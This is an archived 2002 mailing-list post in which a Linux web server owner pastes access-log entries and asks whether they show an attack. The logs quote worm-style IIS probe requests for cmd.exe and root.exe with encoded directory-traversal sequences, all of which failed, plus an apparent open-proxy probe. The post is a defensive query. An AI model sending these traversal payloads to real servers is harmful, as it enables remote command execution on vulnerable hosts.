how to explain these logs?
From: chris (whoooever@yahoo.com)Date: 02/05/02
- Next message: Alexander: "Re: firewall securing outgoing traffic?"
- Previous message: James Proffer: "Re: security violation behind a firewal??"
- Next in thread: Mike Golden: "Re: how to explain these logs?"
- Reply: Mike Golden: "Re: how to explain these logs?"
- Reply: RainbowHat: "Re: how to explain these logs?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: whoooever@yahoo.com (chris) Date: 4 Feb 2002 22:50:34 -0800
Hi,
I'm getting lots of this in my www log file: "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
Does this mean some one is attacking me as windows? (see below piece
of log file) I'm running RH72 with firewall.
Also, in some place of the log file, I see these 2 lines where the
URLs after "GET" are nothing to do with my URL/web server. How could
this happen? Is it some one isusing my machine to access other web
site?
Can some one explain this a little bit to me, or point me to a place
for more details? Thanks a lot!
210.21.30.169 - - [04/Feb/2002:00:29:37 -0800] "GET
http://www.sina.com.cn/ HTTP/1.1" 200 692 "-" "Mozilla/4.0
(compatible; MSIE 4.01; Windows 95)"
216.35.116.20 - - [04/Feb/2002:04:55:48 -0800] "GET
/allhotel/Beijing_Hilton.htm HTTP/1.0" 404 294 "-" "Mozilla/5.0
(Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)"
==== more logs ====
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:58 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-"
"-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:58:59 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338 "-" "-"
35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
63.121.98.164 - - [03/Feb/2002:05:59:01 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
"-" "-"
63.121.98.164 - - [03/Feb/2002:05:59:02 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-"
"-"
216.35.116.91 - - [03/Feb/2002:11:27:19 -0800] "GET /robots.txt
HTTP/1.0" 404 277 "-" "Mozilla/3.0 (Slurp/si; slurp@inktomi.com;
http://www.inktomi.com/slurp.html)"
===end===
- Next message: Alexander: "Re: firewall securing outgoing traffic?"
- Previous message: James Proffer: "Re: security violation behind a firewal??"
- Next in thread: Mike Golden: "Re: how to explain these logs?"
- Reply: Mike Golden: "Re: how to explain these logs?"
- Reply: RainbowHat: "Re: how to explain these logs?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
